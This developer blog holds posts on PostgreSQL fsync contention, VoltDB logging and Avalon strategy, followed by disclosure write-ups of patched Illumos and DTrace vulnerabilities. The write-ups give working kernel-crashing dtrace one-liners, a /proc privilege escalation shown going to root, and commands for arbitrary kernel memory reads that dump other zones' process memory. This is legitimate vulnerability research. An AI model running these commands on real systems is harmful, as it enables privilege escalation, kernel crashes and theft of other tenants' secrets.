Ben's Blog

Developer Musings

Postgresql Non-Durable Reads

This is an experiment where we try to find out how much faster Postgres will run if patch it to support non-durable reads. Postgresql supports a number of options when commiting but the ones we are interested in at the moment are synchronous_commit = on and synchronous_commit = off. When it is set to on Postgresql will wait until the WAL is properly synchronized to the disk before returning to the client and when it is off it will not wait at all. Also, when it is on postgresql will not release any locks or make any tuples visible to other transactions until the WAL is synchronized to disk. This means if you have heavy write contention on a particular row then all of your connections can end up being serialized around fsync().

For example take this query:

1
UPDATE counters set counter = counter + 1 where id = 0;

If you run this using pg_bench and 128 clients on Macbook Air with wal_sync_method = fsync and synchronous_commit = on you will get around 1283 transaction/s. This is with an fsync cost of about 0.2 ms. If you change wal_sync_method = fsync_writethrough this increases the fsync cost to about 10ms and the throughput will drop to around 90 transaction/s. If you switch synchronous_commit = off this will increase perforamnce and you will get around 2611 transaction/s. However, this is kind of unsafe and you might lose transactions that you think have been committed if you have a sudden loss of power.

Now, we have made a change to postgresql to drop its locks and record the transaction as visible and then wait for the WAL log to be synchronised to disk. This gives you similar guarantees to synchronous_commit = on and similar performance to synchronous_commit = off when there is high contention. When, there is low contention it has similar performance to synchronous_commit = on.

After, this change we get 3321 transactions/s which is about 2.5 times better performance that synchronous_commit = on and suspiciously even higher than synchronous_commit = off. Currently, I don’t have an explanation for this and it would seem to indicate that there is an implementation error in the patch. (Definitely, do no trust this patch with real data this is currently just an experiment.) I would expect that this new mode would perform strictly worse than synchronous_commit = off.

It also important to note that using this setting sychronous_commit = local_non_durable_reads will produce read anomalies that can be similar to the write anomalies you get with sychronous_commit = off. For example if you insert an tuple and it fails with a unique check then you later try to read that tuple then it is possible it won’t be there anymore because the original write was not durable when the read was performed for the unique check. But for this counter example it is 100% safe as long as you never try to read the value of the counter :)

If there is any interest in this I might try to upstream the patch into PG. I’m just not sure if there are people running with high enough contention and high enough fsync times to make this setting useful.

NonDurableReadPatch Benchmarks

VoltDB Command Logging Quirks

Since the last post on fsync and non-durable reads we have had a play around with VoltDB too see if our speculation with how synchronous command logging works would be consistent with it’s performance.

The first thing we noticed is that read-only transactions wait for the log interval even if there are no previous write transactions waiting for their command log to be synced to disk. You can observe this by setting log frequency to 5000ms (the maximum) and using synchronous logging. Then if you run an ad-hoc select statement from sqlcmd you will notice that it sometimes takes the full 5 seconds to return a result. It is important to note read-only transaction will not wait for a disc sync if there is only read only transactions in the command log buffer. But even without the sync some read only transactions will be unecessarily be delayed because they wait for the command log to be flushed. I have a LD_PRELOAD module that would delay synchronization by 1 second and I never observed a read-only transaction taking more than 5 seconds to return a result. However, if there are write transactions in the buffer then the read-only transaction will wait for the command log to be synchronised (presumably the data from the read-only transaction isn’t actually written). This waiting for previous write transactions to sync to disk prevents the non-durable read problem discussed in the previous post.

It is kind of weird that VoltDB unecessarily stalls some read transactions but this is probably not a big deal with real workloads because frequency will be set to 1ms and most workloads are a mix of read and writes and writes will always cause the command log to be synchronised.

Here are some links from VoltDB that explain how command logging works and can be configured for optimal performance.

FSync DB Lock Contention

Lets say you have a table in a database that you are using to keep track of a counter value. So something like:

1
2
3
4
5
6
Column |  Type   | Modifiers
--------+---------+-----------
 id     | integer | not null
 count  | integer | not null
Indexes:
    "test_pkey" PRIMARY KEY, btree (id)

If you have lots of connections updating values doing the query: update test set count = count + 1 where id = $1; then on postgresql you should have very decent performance as long as the id values do not overlap too much. Even though postgresql needs to fsync the WAL to disk for each commit it is able to amortise the cost of this over many commits if the commits start to queue up because fsyncing is slow. For example the WAL fsyncs might be something like:

1
2
3
4
5
6
7
8
9
10
11
12
update test set count = count + 1 where id = 1
FSYNC WAL
update test set count = count + 1 where id = 2
update test set count = count + 1 where id = 3
..
update test set count = count + 1 where id = 100
FSYNC WAL
update test set count = count + 1 where id = 101
update test set count = count + 1 where id = 102
..
update test set count = count + 1 where id = 200
FSYNC WAL

However, if the id values overlap and in the worst case if they are all the same then not only do you have a problem with lock contention but you also have a problem with serializing all of the fsyncs. Postgresql and presumably any sane RDBMS will hold a write lock on the updated records until the transaction is durable. So you end up getting all the WAL fsyncs done in a completely serial order.

1
2
3
4
5
6
7
8
update test set count = count + 1 where id = 1
FSYNC WAL
update test set count = count + 1 where id = 1
FSYNC WAL
update test set count = count + 1 where id = 1
FSYNC WAL
update test set count = count + 1 where id = 1
FSYNC WAL

Before the land of SSDs this would be absolutely horrible. If you are paying 6ms for a fsync then it completely destroys your throughput (166 fsync/s). But now with SSDs (or previously with battery backed caches) the fsync cost is much lower so this is less of an issue. For example with Amazon EBS I see fsync cost of around 0.5ms (2000 fsync/s) and i3 NVME performance of ~0.05ms (20000 fsync/s).

Is it possible for an RDBMs to fix this fsync problem? So when you think about it an RDBMs could drop all the locks a transaction has once it has decided that nothing except for the WAL fsync would prevent it from committing. This would kind of work because another transaction that would modify the same row would be dependent on the previous WAL segments committing before it could commit. However, this opens up a big consistency hole in the way clients interact with the database. For example you could see this happening:

1
2
3
4
5
6
7
8
9
10
11
12
TX1: BEGIN;
TX1: insert into test(id) values(1);
TX1: COMMIT;

<TX1 not fsync'd>

TX2: BEGIN;
TX2: insert into test(id) values(1);

<instead of blocking here for TX1 to commit it raises unique error>

DB: POWER FAILURE <TX1 is never committed>

Here we see a case where the second transaction observes data in the database that was not durable. It might think that because the record is already in the database it can do something else with an external system and then we end up having a problem. This particular case is also weird because the transaction gets in a state where it can’t be committed. If you successfully commit a transaction that has touched non-durable records then all the reads are safe because the records would now be durable after the commit. But a transaction with an error is not committable so you would also need to add a weird hook where a rollback (or implicit rollback) might have to wait for other transactions to fsync before returning to the client.

Also, transactions that did not modify data would normally have a no-op commit but if they were shown non-durable records they would need to potentially wait to commit.

Basically, it could kind of work as long as all transactions waited for a successful commit/rollback before acting on any data they read from the DB but this does not seem realistic.

If you look at VoltDB it looks like they only let you do transactions inside stored procedures. I’ve also seen a comment along the lines that they do batch commits. Considering, they are single threaded presumably they handle a bunch of transactions on the thread and add them to a queue that is fsynced in batches then the results from the stored procedures are sent back to the client. This presumably removes any of the consistency problems you have from a system that has external transactions where non-durable reads can escape.

If you want to play around with postgresql to see what effects wal fsync delay has I have a LD_PRELOAD library that will add 10s to every fsync. wal_delayer

Mechanically Solving Avalon

I’ve been thinking for a while if it is possible for the ‘good’ team in Avalon to follow some optimal strategy that would always achieve victory. To simplify things this post will focus on finding an optimal strategy for 5 person Avalon when the Merlin(Commander) and the Assassin are both in play. It is important to note in this variant the ‘good’ team at best can only win on average 2/3 of games because the ‘evil’ team can always randomly pick the Merlin at the end of the game and will guess correctly 1 in 3 times. This question has also been answered before on stackexchange but we will try and answer it without crypto. But we will use something very similar to crypto and similar strategies so I’m not sure if we are adding anything useful.

The 5 person Avalon game is interesting because there are only 2 ‘evil’ and 3 ‘good’ people. This creates an easy mechanism to solve the game.

  1. After the game has been setup everyone secretly writes down a list of people they know are good. Merlin writes down the people who knows are good. Other good people pretend to write down a list of people but instead write gibberish.

  2. The lists are shuffled.

  3. There will be either 1, 2 or 3 non-gibberish lists depending on what the ‘evil’ people do.

  4. If there is 1 non-gibberish list the ‘good’ teams wins by just following the list because this is Merlin’s list.

  5. If there is 2 or 3 non-gibberish lists then follow one list until it fails then switch to the other list. It is only possible for at most 2 missions to fail because after a list fails it is no longer used to pick teams. If only 2 missions fail then 3 missions succeed and the good team wins.

The strategy also shows why the Assassin is so important in the 5 player variant. Because without the Assassin the Commander could just announce themselves and even if the evil team optimally bluffed and impersonated the Commander themselves they would still be guaranteed to lose.

This strategy only works when there are 2 ‘evil’ players so only in the 5 and 6 player variants. Once a third ‘evil’ player is introduced it is possible to fail 3 missions using 3 evil lists.

Can we solve 7+ player games using this strategy?

If we have 3 evil players then we need to eliminate a list initially or run a mission that will eliminate two lists instead of one.

Unlike the stackexchange solution we don’t have a way to identify the author of a list so some of the strategies for eliminating lists do not work. However, we can still:

  1. If a mission fails then any list that contains all the members of the failing mission is also a bad list.

  2. If a mission fails and none of the members of the failing mission is in the compliment of a list then this list is a bad list.

  3. Any members common to all lists are good.

To test whether evil players have a winning strategy it should be possible to brute force all the combinations of evil lists: 7C43 + 7C42 + 7C4 => 44135 and see if any of them can’t be solved by an optimal good team.

Avalon Fonix/Grabyo Meta Snapshot

For those that don’t know Avalon (or The Resistance) is a board game where a ‘good’ team which consist of the majority of players attempt to pass 3 missions while an ‘evil’ team which consist of a minority of the players try to sabotage them. The ‘evil’ team achieves this objective by convincing the other players to put them on missions and then failing the missions. The ‘evil’ team is in a better position to do this because they know who all the other ‘evil’ players are and can coordinate their voting or influence discussions to achieve their objective. On the other hand the ‘good’ team is generally in the dark about the identity of the other players except for a few important exceptions.

We generally play 10 players with the Commander (Merlin), Bodyguard (Percival), Deep Cover (Mordred) and False Commander (Morgana) characters. The Commander knows who all the evil characters are except for Deep Cover. The Bodyguard knows who the Commander and False Commander is but doesn’t know which is which. We also use the Lady of the Lake which allows its holder after the second round to find out which team another play is on privately. The person being interrogtated cannot lie but the person receiving the information can lie or tell the truth to the rest of the table. The Lady of the Lake token then passes to the player that was interrogated and they get an opportuntity to use it on the next round and so forth. We also sometimes play only vanilla resistance without characters but with plot cards.

Because we play a lot with each other some interesting behaviour has emerged. Firstly, we have a house technique which allows multiple evil players to coordinate failing a mission. For example in a 3 player mission with two evil players it would be a disaster if both evil players put in a fail card. So it has evolved that the person who proposed the mission or the first evil player clockwise (the first evil player to pick the next mission) from the person who proposed the mission is responsible for failing the mission. This removes a lot of deductive ability from the good team because it is difficult to assume that there is only 1 evil player in a mission if it fails.

We have also noticed that a lot of missions in the first round will be forced to the last pick because in the ten player games it is very difficult to get 6 good people (all the good people) to coordinate on picking a team. So generally the only way a mission passes before the last pick in the first round is because of evil shenanigans so good people are wary of voting for a team they are not on. This often means the position of the players has a large effect on the outcome of the game.

A lot of the games lately are being won by the good team but then the win is being overturned by the assassin. In the latest game the Assassin was not picked because they provided the most useful information to the table, they actually did very little, but rather because they made no incorrect statements. The evil team is often very focused on finding the Commander even to the detriment of getting a clean win.

DTrace Division by Zero

For some background check John Regehr’s excellent post on the history of problems caused by dividing INT_MIN by -1. DTrace is an interpreter that runs inside the kernel on both Illumos and OSX. Before it was patched in Illumos it was possible to create an expression to divide INT_MIN by -1 and this would cause the kernel to crash.

1
2
sudo dtrace -n 'BEGIN{v = 0x8000000000000000LL; print((long)v/-1)}'
sudo dtrace -n 'BEGIN{v = 0x8000000000000000LL; print((long)v%-1)}'

This is still an issue in OSX. I emailed them a month ago along with links to other DTrace issues that have been fixed in Illumos and not OSX and haven’t heard back. Since this is not really a security issue I’m posting it here. You need root in order to trigger the DTrace division by zero and if you have root you can already reboot the machine :/. You also need root to trigger all of the other issues.

Local Privilege Escalation in Illumos via /proc

The /proc permissions in Illumos were optional. I’m not sure how long this has been an issue but looking at the history of the files associated with the permission check I could not find where the problem was introduced. I checked if this was also an issue in Solaris but this had been fixed in Solaris. However, I could not find the CVE associated with this fix. My suspicion is that this has been an issue prior to the Illumos fork and was found by Solaris engineers and fixed in Solaris but not fixed in Illumos.

I found this vulnerability when I was looking for a RBAC bypass. RBAC in Solaris lets you have different named privileges associated with each process. It is possible for a process with a lot of privileges to drop most of them and keep only the ones that it needs. I thought it might be possible for a low privilege process to use /proc to debug a process owned by the same user that had higher privileges. This was because I thought the filesystem permissions would be the only permission check that would be performed. But if I would have checked the man page I would have seen:

EPERM


An attempt was made to control a process of which the E, P, and I privilege sets were not a subset of the effective set of the controlling process or the limit set of the controlling process is not a superset of limit set of the controlled process.

But I didn’t check the man page and just tried to write to a /proc file of a higher privileged process using bash.

1
echo "wat" > /proc/23912/lwp/1/lwpctl

Which instead of giving a permission error gave back an I/O error.

This issue can be demonstrated via the following commands:

First we drop the sys_mount permission which will prevent us from opening proc on our parent bash process because we have a subset of permissions.

1
2
3
4
5
6
7
8
ppriv -s A-sys_mount -e /bin/bash
[root@web01 ~]# ppriv $$
23929:  /bin/bash
flags = PRIV_AWARE
        E: basic
        I: basic
        P: basic
        L: basic,contract_event,contract_identity,contract_observer,dtrace_proc,dtrace_user,file_chown,file_chown_self,file_dac_execute,file_dac_read,file_dac_search,file_dac_write,file_owner,file_setid,ipc_dac_read,ipc_dac_write,ipc_owner,net_bindmlp,net_icmpaccess,net_mac_aware,net_observability,net_privaddr,net_rawaccess,proc_audit,proc_chroot,proc_lock_memory,proc_owner,proc_prioup,proc_setid,proc_taskid,sys_acct,sys_admin,sys_audit,sys_fs_import,sys_ip_config,sys_iptun_config,sys_nfs,sys_ppp_config,sys_resource,sys_smb

Next, we try and open the parent process lwpctl and it correctly fails.

1
2
3
4
5
6
7
8
9
10
11
12
13
[root@web01 ~]# ps
  PID TTY         TIME CMD
23929 pts/4       0:00 bash
23911 pts/4       0:00 login
23912 pts/4       0:00 bash
23935 pts/4       0:00 ps

python

>>> os.open("/proc/23912/lwp/1/lwpctl", os.O_WRONLY)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
OSError: [Errno 13] Permission denied: '/proc/23912/lwp/1/lwpctl'

Next, we open the file with O_CREAT and it incorrectly succeeds.

1
2
>>> os.open("/proc/24421/lwp/1/lwpctl", os.O_CREAT|os.O_APPEND|os.O_WRONLY)
3

In Illumos there is the concept of a VNode which is contains a bunch of pointers to methods that are used by the kernel to interact with the filesystem. When a file is opened the kernel will call a #access method on the VNode first and then will call the open method on the VNode if it the #access succeeds. However, in the case when O_CREAT is passed the kernel will only call the #create method and it will assume the #create method will also call the #access method. In the case of the /proc file system this was not happening so anybody could pass in O_CREAT and no permission check would occur so the open would always succeed. Since there is no other checks not only does this work as an RBAC bypass it always works as a privilege escalation from non-root to root. It is important to note that Zone’s contain this issue and it doesn’t seem possible to use this as a way of escalating your privileges outside of a Zone.

If you look at the patch you can see a call to #praccess was added and some other checks as well that I don’t understand.

I notified Joyent about this on the 14th of Decemeber and they had a fix commited by the 17th. The advisory from Joyent is available here. The Joyent people are probably quietly cheering on the demise of Solaris because as you can see from this vulnerability security issues might be fixed in Solaris while still being vulnerable in Illumos. One way of looking at this is that Oracle is selling a zero day exploit feed for Joyent’s public cloud. Though, it is probably not that bad because the code bases have diverged a bit.

Exploit

I have an exploit for this that will use the lwp_agent to create a file /tmp/elevator that is suid root. It also uses the lwp_agent to write a program to this file that contains:

1
2
3
  setuid(0);
  setgid(0);
  execv("/bin/bash");

It can be compiled via:

1
2
  gcc -nostdlib -static bash.s -o bash
  gcc -o go go.c

Example output:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
  root@web01:~# id
  uid=1000(ben) gid=1(other) groups=1(other)

  root@web01:~# ppriv $$
  36695:  sh
  flags = <none>
    E: basic
    I: basic
    P: basic
    L: basic,contract_event,contract_identity,contract_observer,dtrace_proc,dtrace_user,file_chown,file_chown_self,file_dac_execute,file_dac_read,file_dac_search,file_dac_write,file_owner,file_setid,ipc_dac_read,ipc_dac_write,ipc_owner,net_bindmlp,net_icmpaccess,net_mac_aware,net_observability,net_privaddr,net_rawaccess,proc_audit,proc_chroot,proc_lock_memory,proc_owner,proc_prioup,proc_setid,proc_taskid,sys_acct,sys_admin,sys_audit,sys_fs_import,sys_ip_config,sys_iptun_config,sys_mount,sys_nfs,sys_ppp_config,sys_resource,sys_smb

  root@web01:~# ps auxww |grep vi
  root     36626  0.0  0.2 5012 3344 pts/2    S 21:48:50  0:00 vi /tmp/test


  root@web01:~# ./go 36626
  found syscall: fefe2255
  file_size: 1464 8046a50
  write returned: 1464
  [root@web01 /root]# id
  uid=0(root) gid=0(root)
  [root@web01 /root]# ppriv $$
  36724:  /bin/bash
  flags = <none>
    E: basic,contract_event,contract_identity,contract_observer,dtrace_proc,dtrace_user,file_chown,file_chown_self,file_dac_execute,file_dac_read,file_dac_search,file_dac_write,file_owner,file_setid,ipc_dac_read,ipc_dac_write,ipc_owner,net_bindmlp,net_icmpaccess,net_mac_aware,net_observability,net_privaddr,net_rawaccess,proc_audit,proc_chroot,proc_lock_memory,proc_owner,proc_prioup,proc_setid,proc_taskid,sys_acct,sys_admin,sys_audit,sys_fs_import,sys_ip_config,sys_iptun_config,sys_mount,sys_nfs,sys_ppp_config,sys_resource,sys_smb
    I: basic
    P: basic,contract_event,contract_identity,contract_observer,dtrace_proc,dtrace_user,file_chown,file_chown_self,file_dac_execute,file_dac_read,file_dac_search,file_dac_write,file_owner,file_setid,ipc_dac_read,ipc_dac_write,ipc_owner,net_bindmlp,net_icmpaccess,net_mac_aware,net_observability,net_privaddr,net_rawaccess,proc_audit,proc_chroot,proc_lock_memory,proc_owner,proc_prioup,proc_setid,proc_taskid,sys_acct,sys_admin,sys_audit,sys_fs_import,sys_ip_config,sys_iptun_config,sys_mount,sys_nfs,sys_ppp_config,sys_resource,sys_smb
    L: basic,contract_event,contract_identity,contract_observer,dtrace_proc,dtrace_user,file_chown,file_chown_self,file_dac_execute,file_dac_read,file_dac_search,file_dac_write,file_owner,file_setid,ipc_dac_read,ipc_dac_write,ipc_owner,net_bindmlp,net_icmpaccess,net_mac_aware,net_observability,net_privaddr,net_rawaccess,proc_audit,proc_chroot,proc_lock_memory,proc_owner,proc_prioup,proc_setid,proc_taskid,sys_acct,sys_admin,sys_audit,sys_fs_import,sys_ip_config,sys_iptun_config,sys_mount,sys_nfs,sys_ppp_config,sys_resource,sys_smb

Arbitrary Kernel Memory Reads on Illumos

Illumos is the name of the operating system that was forked from OpenSolaris and is being used to power Joyent’s Triton cloud platform. Joyent have their own branded version of Illumos called SmartOS. Joyent’s cloud is interesting because they offer hosting using Zones where customers share the same kernel. This is in contrast to traditional cloud providers who provide isolation between customers using virtual machines. However, it seems that kernel provided isolation is becoming more popular. Looking at AWS Lambda it appears that Linux kernel namespaces are being used to provide isolation. Because the kernel is used to provide isolation it means the whole of the kernel becomes an attack surface. This is especially interesting in the case of Illumos because Illumos runs an interpreter inside the kernel called DTrace which is one of the big selling points of Triton.

DTrace is an incredibly complex piece of code and it consists of more than 17k lines of C code. It is very difficult to write this amount of C code without introducing lots of bugs :( During my review of the DTrace source code I stumbled across two integer overflows and an out of bound read that could be converted to arbitrary kernel writes. I also found five bugs that could be used for arbitrary memory reads. I find exploitation of these arbitrary memory reads more interesting than the privilege escalation bugs so I’m going to write about four of these first. I intend to write up the other bugs but these were disclosed starting from September 2015 so don’t hold your breath.

DTrace Copy Out

If you look at the DTrace user guide it has this definition for the copyout function:

void copyout(void *buf, uintptr_t addr, size_t nbytes)`

The `copyout()` action copies data from a buffer to an address in memory. The number of bytes that this action copies is specified in nbytes. The buffer that the data is copied from is specified in buf. The address that the data is copied to is specified in addr. That address is in the address space of the process that is associated with the current thread.

When you call copyout this code is run by DTrace:

case DIF_SUBR_COPYOUT: {
  uintptr_t kaddr = tupregs[0].dttk_value;
  uintptr_t uaddr = tupregs[1].dttk_value;
  uint64_t size = tupregs[2].dttk_value;

  if (!dtrace_destructive_disallow &&
      dtrace_priv_proc_control(state, mstate) &&
      !dtrace_istoxic(kaddr, size)) {
    DTRACE_CPUFLAG_SET(CPU_DTRACE_NOFAULT);
    dtrace_copyout(kaddr, uaddr, size, flags);
    DTRACE_CPUFLAG_CLEAR(CPU_DTRACE_NOFAULT);
  }
  break;
}

Unfortunately, copyout does exactly what it says on the tin. It copies out kernel memory into userspace without any checks :(. The kaddr and size values are completely controlled by the user. If we check the rest of the call path there is no code that checks that the user is allowed access to the range specified by kaddr and size. In fact, there is a function specifically designed to check this called dtrace_canload but this was not used. The patch fixes this issue by adding a dtrace_canload check:

  if (!dtrace_destructive_disallow &&
        dtrace_priv_proc_control(state, mstate) &&
-        !dtrace_istoxic(kaddr, size)) {
+        !dtrace_istoxic(kaddr, size) &&
+        dtrace_canload(kaddr, size, mstate, vstate)) {

Exploiting Arbitrary Memory Reads

At first glance there doesn’t seem to be that much interesting stuff in Illumos to read from kernel memory. Illumos doesn’t have KASLR so you can’t use an arbitrary memory to discover where stuff is mapped in to bypass KASLR. It should be possible to dump the filesystem buffer cache or even kernel SLABs used for syscall args which could hold sensitive information from other processes on the system but I didn’t persue this option.

It would be great if you could dump memory from other processes but this is not possible on x86 because only the currently running process and the kernel are mapped into memory. However, luckily for us Illumos 64bit maps all the physical memory at a known address in the kernel’s virtual address space. I think this is done to make it easier to set up page tables. So all you have to do to read the memory from another process is convert the virtual address you want to read to a physical address and then just add this physical address to the kernel physical address offset (kpm_vbase). This is all possible because the information to do this is inside the kernels memory and we have an arbitrary kernel memory read. The location of all these static locations like kpm_vbase are also helpfully exported by the kernel (they are not really secret anyway because no KASLR) and can be accessed using a library called libctf. That doesn’t stand for lib capture the flag :(

We can also get a list of all the running processes from the practive linked list. Normally when you are inside a Zone you can only see processes inside your own Zone. This allows us to create a tool that can be plugged in with an arbitrary kernel memory read and provide us with a ps that will dump all the processes running on the system and allow us to dump the memory contained in these processes.

Here is an example session with the tool being used to dump the heap from a vim process running in the global zone:

./global_ps

PID COMMAND PSARGS BRKBASE
8024 global_ps ./global_ps 0x414b90
8015 vim vim secret.txt 0x81f8be8

./global_ps segment -p 8015

ADDRESS SIZE FLAGS
0xfec2f000 4096
0x81ef000 188416 [heap]

./global_ps dump -p 8015 -a 0x81ef000 -s 188416 > dump

In a shared system this can be very dangerous because you can read private keys, and authentication information from other processes. It also shows that relatively benign vulnerabilities can be very serious on systems that are used for shared hosting.

POC Code on Github

DTrace INET_NTOA

This is a similar issue to the copyout problem. This is what the DTrace user guide has to say about inet_nota

string inet_ntoa(ipaddr_t *addr)

inet_ntoa takes a pointer to an IPv4 address and returns it as a dotted quad decimal string. This is similar to inet_ntoa() from libnsl as described in inet(3SOCKET), however this D version takes a pointer to the IPv4 address rather than the address itself. The returned string is allocated out of scratch memory, and is therefore valid only for the duration of the clause. If insufficient scratch space is available, inet_ntoa does not execute and an error is generated.

The code for the inet_ntoa function does not do any checking to see if the addr is allowed to be accessed.

case DIF_SUBR_INET_NTOA:
case DIF_SUBR_INET_NTOA6:
case DIF_SUBR_INET_NTOP: {
  size_t size;
  int af, argi, i;
  char *base, *end;

  if (subr == DIF_SUBR_INET_NTOP) {
    af = (int)tupregs[0].dttk_value;
    argi = 1;
  } else {
    af = subr == DIF_SUBR_INET_NTOA ? AF_INET: AF_INET6;
    argi = 0;
  }

  if (af == AF_INET) {
    ipaddr_t ip4;
    uint8_t *ptr8, val;

    /*
     * Safely load the IPv4 address.
     */
    ip4 = dtrace_load32(tupregs[argi].dttk_value);

The tupregs[argi].dttk_value value can be controlled by the user and there is no call to dtrace_canload. This comment about ‘Safely’ is misleading in this context because dtrace_load32 prevents the kernel from panicing on a bad load and prevents access to memory mapped IO regions. So by using inet_ntoa we can read 4 bytes of arbitrary kernel memory. We just need to parse the dotted IP address back to bytes.

This bug is interesting because it can be demonstrated from the command line.

>  dtrace -n 'BEGIN{ print(inet_ntoa((in_addr_t*)&`_mmu_pagemask))}'
dtrace: description 'BEGIN' matched 1 probe
CPU     ID                    FUNCTION:NAME
  0      1                           :BEGIN string "0.240.255.255"

From the global zone we can verify it has read the 4 bytes 0x00f0ffff

> echo '_mmu_pagemask::dump'| mdb -k
                    0 1 2 3  4 5 6 7 \/ 9 a b  c d e f  01234567v9abcdef
fffffffffb94a1d0:  ff0f0000 00000000 00f0ffff ffffffff  ................

We can plug this vulnerability into our framework and use it to list processes and dump their memory contents. You might be concerned that reading 4 bytes at a time is slow but there is no noticable delay when listing processes.

POC Code on Github

DTrace Hash Corruption

DTrace has support for hashmaps and allows the user to access the data in the hashmap using the store and load instructions. DTrace tries to separate the metadata from the data and only allow the user to modify the data. However, it is possible to modify the metadata and this allows an attacker to create a memory oracle. An attacker can choose an address and an array of bytes and check whether the memory at that address is equal to the array of bytes. This is equivalent to a slow arbitrary memory read because you can check a single byte 256 times to read a single byte of memory.

In dtrace_canstore it checks that the offset into the hash chunk is greater than the size of dtrace_dynvar_t.

https://github.com/joyent/illumos-joyent/blob/release-20151224/usr/src/uts/common/dtrace/dtrace.c#L679

chunkoffs = (addr - base) % dstate->dtds_chunksize;

if (chunkoffs < sizeof (dtrace_dynvar_t))
  return (0);

Presumably, it is doing this to prevent the user from writing to the metadata in the hash chunk and the author believed all the metadata is contained in the dtrace_dynvar_t structure. This belief is true but dtrace_dynvar_t is a dynamically sized structure with the embedded structure dtrace_tuple containing a dynamically sized array of dtrace_key structures.

typedef struct dtrace_dynvar {
  uint64_t dtdv_hashval;      /* hash value -- 0 if free */
  struct dtrace_dynvar *dtdv_next;  /* next on list or hash chain */
  void *dtdv_data;      /* pointer to data */
  dtrace_tuple_t dtdv_tuple;    /* tuple key */
} dtrace_dynvar_t;

typedef struct dtrace_tuple {
  uint32_t dtt_nkeys;     /* number of keys in tuple */
  uint32_t dtt_pad;     /* padding */
  dtrace_key_t dtt_key[1];    /* array of tuple keys */
} dtrace_tuple_t;

typedef struct dtrace_key {
  uint64_t dttk_value;      /* data value or data pointer */
  uint64_t dttk_size;     /* 0 if by-val, >0 if by-ref */
} dtrace_key_t;

So if there is more than one key value then an attacker is able to write into the key values beyond the first one. The dttk_value field is treated as pointer if the dttk_size field is non-zero.

Unfortunately, the only place where dttk_value field seems to be used is as an argument to the dtrace_bcmp function. When the hashmap looks up a value and finds a matching entry based on the hash code it checks that the keys are equal using the dtrace_bcmp function.

https://github.com/joyent/illumos-joyent/blob/release-20151224/usr/src/uts/common/dtrace/dtrace.c#L1791

for (i = 0; i < nkeys; i++, dkey++) {
  if (dkey->dttk_size != key[i].dttk_size)
    goto next; /* size or type mismatch */

  if (dkey->dttk_size != 0) {
    if (dtrace_bcmp(
        (void *)(uintptr_t)key[i].dttk_value,
        (void *)(uintptr_t)dkey->dttk_value,
        dkey->dttk_size))
      goto next;
  } else {
    if (dkey->dttk_value != key[i].dttk_value)
      goto next;
  }
}

So we don’t have a direct read or write primitive but we can tell indirectly if a piece of memory is identical to the value the dttk_value field points to. We can do this by:

  1. Storing a value in the hash with two keys. A first dummy key and a second key which is the the byte we want to check. ie:

      buf[0] = 0xff; hash[1, buf] = "h"
    
  2. We can find the address of the dttk_value field for second key by doing:

     addr = (&hash[1, buf][0]) - 0x28
    

    Example showing the address of the value:

     [root@web01 ~]# dtrace -n 'char buf[1]; BEGIN {buf[0]=0xff;hash[1,buf]="h";addr = (&hash[1, buf][0]); print(addr)}'
     dtrace: description 'char buf[1]' matched 1 probe
     CPU     ID                    FUNCTION:NAME
       0      1                           :BEGIN char * 0xffffff00efa5c2d8
    

    If you look at the memory layout in the kernel the address of the key is clearly 0x28 behind the value (0x68):

     0xffffff00efa5c2d8-0x28,0x28::dump
    
                         \/
     0xffffff00efa5c2b0: d0c2a5ef 00ffffff 01000000 00000000
     0xffffff00efa5c2c0: 01000000 00000000 00000000 00000000
     0xffffff00efa5c2d0: ff000000 00000000 68000000 00000000
    
  3. We can change the pointer stored in the dttk_value field by doing: *(unsigned long*)addr = 0xdeadbeefdeadbeefL and trigger a kernel panic by looking up a value in the hash by doing &hash[1,buf][0].

      [root@web01 ~]# dtrace -n 'char buf[1]; BEGIN {buf[0]=0xff;hash[1,buf]="h";addr = (&hash[1, buf][0]) - 0x28; print(addr); *(unsigned long*)addr = 0xdeadbeefdeadbeefL; &hash[1,buf][0]}'
      dtrace: description 'char buf[1]' matched 1 probe
    
  4. We can turn this into a memory oracle by instead of putting a rubbish address we put the address of a value we want to check and if we have dynvarsize=36 then dtrace will only return a hash value if the byte at the address is equal to the original buf[0]=?? key. This is because the case where they are not equal dtrace will try to allocate another chunk in the hash but there is no more space for this chunk.

Example where the byte mismatches buf[0]=0xff:

[root@web01 ~]# dtrace -x dynvarsize=36 -n 'char buf[1]; BEGIN {buf[0]=0xff;hash[1,buf]="h";addr = (&hash[1, buf][0]) - 0x28; *(void**)addr = &`dtrace_dynhash_sink; print(&hash[1,buf][0])}'
dtrace: description 'char buf[1]' matched 1 probe
dtrace: 1 dynamic variable drop

Example where the byte matches buf[0]=0x1:

[root@web01 ~]# dtrace -x dynvarsize=36 -n 'char buf[1]; BEGIN {buf[0]=0x1;hash[1,buf]="h";addr = (&hash[1, buf][0]) - 0x28; *(void**)addr = &`dtrace_dynhash_sink; print(&hash[1,buf][0])}'
dtrace: description 'char buf[1]' matched 1 probe
CPU     ID                    FUNCTION:NAME
  0      1                           :BEGIN char * 0xffffff00d80cb4d8

Doing 256 syscalls to read 1 byte is slow but the global ps is still responsive :)

POC Code on Github

DTrace STRSTR

If you look at the DTrace user guide it has this definition for the strstr function:

string strstr(const char *s, const char *subs)

strstr returns a pointer to the first occurrence of the substring subs in the string s. If s is an empty string, strstr returns a pointer to an empty string. If no match is found, strstr returns 0.

The dtrace_canload function takes a pointer and a size for checking whether a range can be accessed. However, the strstr function just takes a pointer to a string. How is it possible for strstr to call dtrace_canload to check whether the string can be safely searched? The original implementation only checked dtrace_canload after the string had been searched.

case DIF_SUBR_STRRCHR: {
  /*
   * We're going to iterate over the string looking for the
   * specified character.  We will iterate until we have reached
   * the string length or we have found the character.  If this
   * is DIF_SUBR_STRRCHR, we will look for the last occurrence
   * of the specified character instead of the first.
   */
  uintptr_t saddr = tupregs[0].dttk_value;
  uintptr_t addr = tupregs[0].dttk_value;
  uintptr_t limit = addr + state->dts_options[DTRACEOPT_STRSIZE];
  char c, target = (char)tupregs[1].dttk_value;

  for (regs[rd] = NULL; addr < limit; addr++) {
    if ((c = dtrace_load8(addr)) == target) {
      regs[rd] = addr;

      if (subr == DIF_SUBR_STRCHR)
        break;
    }

    if (c == '\0')
      break;
  }

  if (!dtrace_canload(saddr, addr - saddr, mstate, vstate)) {
    regs[rd] = NULL;
    break;
  }

  break;
}

